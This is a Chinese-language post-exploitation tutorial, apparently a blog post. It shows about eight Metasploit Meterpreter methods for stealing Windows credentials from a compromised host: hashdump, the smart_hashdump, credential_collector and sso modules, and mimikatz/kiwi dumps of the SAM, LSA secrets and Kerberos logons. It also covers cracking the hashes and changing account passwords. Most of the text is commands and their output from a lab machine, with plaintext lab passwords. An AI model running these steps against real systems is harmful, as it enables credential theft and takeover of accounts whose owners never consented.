获取Windows系统密码hash的几种方法

使用metasploit框架提取的密码


第一种 hashdump

执行下面的命令,将获取所有Windows用户保存的所有密码的哈希值

1
2
3
4
5
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
meterpreter >

获取到hash之后你们可以有john加字典进行破解,还可以到在线的破解网站点我提交hash破解。

第二种 run post/windows/gather/hashdump

该模块将使用注册表从SAM数据库获取本地用户帐户,和上一个不一样的是看到test:”test”没。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 73a2a371e4c81f43ef47d86b3bf5d27b...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

test:"test"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::

第三种 run post/windows/gather/smart_hashdump

和上一个差不多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against TEST-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20180208054244_default_192.168.137.128_windows.hashes_811529.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 73a2a371e4c81f43ef47d86b3bf5d27b...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] test:"test"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
[+] test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::

第四种 run post/windows/gather/credentials/credential_collector

多了一点东西,emmmm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > run post/windows/gather/credentials/credential_collector

[*] Running module against TEST-PC
[+] Collecting hashes...
Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1
Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: test:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1
[+] Collecting tokens...
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
test-PC\Administrator
test-PC\test
NT AUTHORITY\ANONYMOUS LOGON

第五种 run post/windows/gather/credentials/sso

这个就比较6一点,直接显示明文了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
meterpreter > run post/windows/gather/credentials/sso 

[*] Running module against TEST-PC
Windows SSO Credentials
=======================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;145220 NTLM test-PC Administrator test123
0;23330968 NTLM test-PC Administrator test123
0;24520612 Negotiate test-PC Administrator
0;24619626 Negotiate test-PC Administrator
0;24717059 Negotiate NT AUTHORITY SYSTEM
0;24986730 Negotiate NT AUTHORITY SYSTEM
0;25063663 Negotiate test-PC Administrator
0;3565115 NTLM test-PC test test123
0;3565139 NTLM test-PC test test123

meterpreter >

第六种 load kiwi

1
2
3
4
5
6
7
8
9
10
11
meterpreter > load kiwi
Loading extension kiwi...

.#####. mimikatz 2.1.1 20170608 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.

我们先来看一下Kiwi的帮助

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Kiwi Commands
=============

Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)

自己可以都试一下,但是有些功能在system权限下是用不了的,反人类吧。降权啊。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : TEST-PC
SysKey : 73a2a371e4c81f43ef47d86b3bf5d27b
Local SID : S-1-5-21-553051396-1028234690-3130437969

SAMKey : ef5996069dea28d34bd17473b9f86386

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : c5a237b7e9d8e708d8436b6148a25fa1

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000003e8 (1000)
User : test
LM :
NTLM : c5a237b7e9d8e708d8436b6148a25fa1

meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : TEST-PC
SysKey : 73a2a371e4c81f43ef47d86b3bf5d27b

Local name : test-PC ( S-1-5-21-553051396-1028234690-3130437969 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {134f8789-8d77-b8a1-d7cd-d1a7758f90dd}
[00] {134f8789-8d77-b8a1-d7cd-d1a7758f90dd} 184b95d332248097138abc2d5a393b0a9f1f8df3fccaf9db9b33b46d0167a8a4

Secret : DefaultPassword
old/text: test123

Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 32 52 75 7c 26 4e 12 a4 cb e1 ce 08 0c fa 8d 34 25 47 cb 95 fc d3 b8 60 34 9d 89 8c 0c e1 29 82 a5 bd ce 19 63 bf bf a2
full: 3252757c264e12a4cbe1ce080cfa8d342547cb95fcd3b860349d898c0ce12982a5bdce1963bfbfa2
m/u : 3252757c264e12a4cbe1ce080cfa8d342547cb95 / fcd3b860349d898c0ce12982a5bdce1963bfbfa2
old/hex : 01 00 00 00 bb 25 c5 89 14 75 57 dd e8 27 78 60 84 26 9e 8f f9 51 6c 86 f6 2d 06 1a 88 97 d6 cb 2d 1c 38 19 0b c3 c9 01 88 d3 6f a2
full: bb25c589147557dde827786084269e8ff9516c86f62d061a8897d6cb2d1c38190bc3c90188d36fa2
m/u : bb25c589147557dde827786084269e8ff9516c86 / f62d061a8897d6cb2d1c38190bc3c90188d36fa2

Secret : NL$KM
cur/hex : b0 03 03 0b 04 67 9a 3e 30 ee a0 d6 e1 72 78 80 07 27 6c 00 4a bd 3d b5 22 cb bf a1 18 04 51 3f af 64 44 c0 b6 46 bf df 62 f7 84 eb 02 6c 66 d9 df ee aa 52 49 ae 6e 05 55 8b 38 f9 10 7d 48 23

meterpreter >

第七种 run post/windows/gather/phish_windows_credentials

这个是调用powershell来执行的,有些服务器有禁用powershell,emmmm等我找到没有锁的再补充。
但是还有一个run powerdump也可以的。

第八种 load mimikatz

也是我常用的一种。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;25063663 Negotiate test-PC Administrator
0;24986730 Negotiate NT AUTHORITY SYSTEM
0;24717059 Negotiate NT AUTHORITY SYSTEM
0;24619626 Negotiate test-PC Administrator
0;24520612 Negotiate test-PC Administrator
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP TEST-PC$
0;22190 NTLM
0;999 NTLM WORKGROUP TEST-PC$
0;23330968 NTLM test-PC Administrator test123
0;3565139 NTLM test-PC test test123
0;3565115 NTLM test-PC test test123
0;145220 NTLM test-PC Administrator test123

meterpreter >

修改密码


第一种

较麻烦:post/windows/manage/change_password
自己show options看看

第二种

Win系统怎么改的?进入shell net user XXX XXX

参考:倾旋的博客-针对国内一大厂的后渗透 - 持续
有4种常用的就够了,有时其他不管用才会用其他的